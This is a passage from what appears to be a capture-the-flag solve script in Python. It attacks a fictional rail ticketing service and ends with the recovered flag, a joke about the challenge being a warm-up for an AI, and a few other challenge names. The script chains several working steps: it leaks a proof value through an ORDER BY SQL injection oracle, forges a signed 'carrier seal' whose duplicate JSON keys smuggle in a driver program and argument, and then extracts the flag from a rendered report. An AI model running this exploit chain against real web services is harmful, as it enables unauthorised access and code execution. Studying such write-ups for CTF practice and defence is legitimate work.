            "topic": BOARD_TOPIC,
            "trainId": TRAIN_ID,
            "seatClass": SEAT_CLASS,
        }))
        bound = json.loads(ws.recv())
        ensure(bound["event"] == "boarding.bound", f"unexpected bound event: {bound}")

        ws.send(json.dumps({
            "type": "boarding.confirm",
            "orderId": order_id,
            "stationCode": STATION,
            "epoch": "2",
        }))
        confirmed = json.loads(ws.recv())
        ensure(confirmed["event"] == "boarding.confirmed", f"unexpected confirm event: {confirmed}")
        return confirmed["ledgerRef"]
    finally:
        ws.close()


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def craft_carrier_seal(batch_id, order_id, template_digest, ledger_ref):
    protected = b64url(json.dumps(
        {"alg": "HS256", "typ": "rail-carrier-seal", "kid": TRUSTED_POLICY_ID},
        separators=(",", ":"),
    ).encode())

    payload_text = (
        "{"
        f"\"batchId\":\"{batch_id}\","
        f"\"orderId\":\"{order_id}\","
        f"\"stationCode\":\"{STATION}\","
        f"\"templateDigest\":\"{template_digest}\","
        f"\"routeName\":\"{TRUSTED_ROUTE}\","
        f"\"ledgerRef\":\"{ledger_ref}\","
        "\"printProfile\":\"counter-copy\","
        "\"printer\":\"thermal-standard\","
        "\"printProfile\":\"clearing-batch\","
        "\"printer\":\"line-printer\","
        "\"prefix\":\"reconciliation\","
        "\"cell\":\"receipt\","
        f"\"driverProgram\":\"{DRIVER_PROGRAM}\","
        f"\"driverArgument\":\"{DRIVER_ARGUMENT}\""
        "}"
    )
    payload = b64url(payload_text.encode())
    signature = b64url(hmac.new(
        TRUSTED_SECRET.encode(),
        f"{protected}.{payload}".encode(),
        hashlib.sha256,
    ).digest())
    return {"protected": protected, "payload": payload, "signature": signature}


def prepare_receipt(order_id, batch_id, template_digest, ledger_ref):
    session = make_session()
    resp = session.post(
        f"{BASE}/api/corporate/receipts/prepare",
        json={
            "stationCode": STATION,
            "orderId": order_id,
            "batchId": batch_id,
            "templateDigest": template_digest,
            "trustLevel": ["mobile", "partner", "settlement"],
            "carrierSeal": craft_carrier_seal(batch_id, order_id, template_digest, ledger_ref),
        },
    )
    ensure(resp.status_code == 201, f"prepare receipt failed: {resp.status_code} {resp.text}")


def schedule_and_fetch_flag(batch_id):
    session = make_session()
    resp = session.post(f"{BASE}/api/corporate/settlement/schedule", json={"batchId": batch_id})
    ensure(resp.status_code == 202, f"schedule failed: {resp.status_code} {resp.text}")

    for _ in range(30):
        time.sleep(0.3)
        resp = session.get(f"{BASE}/api/corporate/reconciliation/{batch_id}")
        ensure(resp.status_code == 200, f"poll failed: {resp.status_code} {resp.text}")
        report = resp.json().get("report")
        if not report or not report.get("body"):
            continue
        body = report["body"]
        if not report.get("ready"):
            continue
        match = re.search(r"([A-Za-z0-9+/=]+)\s*$", body)
        ensure(match is not None, f"base64 payload not found in report body: {body}")
        flag = base64.b64decode(match.group(1)).decode()
        return body, flag
    raise RuntimeError("flag not rendered in time")


def main():
    print_step("creating initial trusted passenger session and waitlisted order")
    order_session = make_session()
    weak_continue_and_waitlist_channel(order_session)
    order = create_waitlisted_order(order_session)
    order_id = order["id"]
    print(f"[=] order_id={order_id}", flush=True)

    print_step("arming station notice feed to publish lane, board profile and JWKS")
    seed_notice_feed()

    print_step("locating ticket number for the target station/train")
    ticket_no = lookup_ticket_no()
    print(f"[=] ticket_no={ticket_no}", flush=True)

    print_step("leaking claim proof through the legacy ORDER BY SQL injection oracle")
    claim_proof = leak_claim_proof(order_id)
    print(f"[=] claim_proof={claim_proof}", flush=True)

    print_step("submitting a valid adjustment rule and compiling it into the station ledger")
    apply_adjustment(ticket_no, claim_proof)
    compile_station_rule(order_id)

    print_step("creating a deferred reconciliation batch")
    batch = create_batch(order_id)
    batch_id = batch["batchId"]
    template_digest = batch["templateDigest"]
    print(f"[=] batch_id={batch_id}", flush=True)
    print(f"[=] template_digest={template_digest}", flush=True)

    print_step("refreshing fulfillment epoch and ledger attestation just before signing")
    ledger_ref = refresh_epoch_and_ledger(order_id)
    print(f"[=] ledger_ref={ledger_ref}", flush=True)

    print_step("forging a trusted carrier seal with duplicate JSON keys")
    prepare_receipt(order_id, batch_id, template_digest, ledger_ref)

    print_step("scheduling settlement rendering and extracting the flag from the report")
    body, flag = schedule_and_fetch_flag(batch_id)
    print(f"report_body={body}", flush=True)
    print(f"flag={flag}", flush=True)


if __name__ == "__main__":
    main()


# ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}

PS: just because it is a warm-up for an AI does not mean it is a warm-up for a human.

AAA26

11

GoMySQL

11

RealDLsite

11

TINJ

11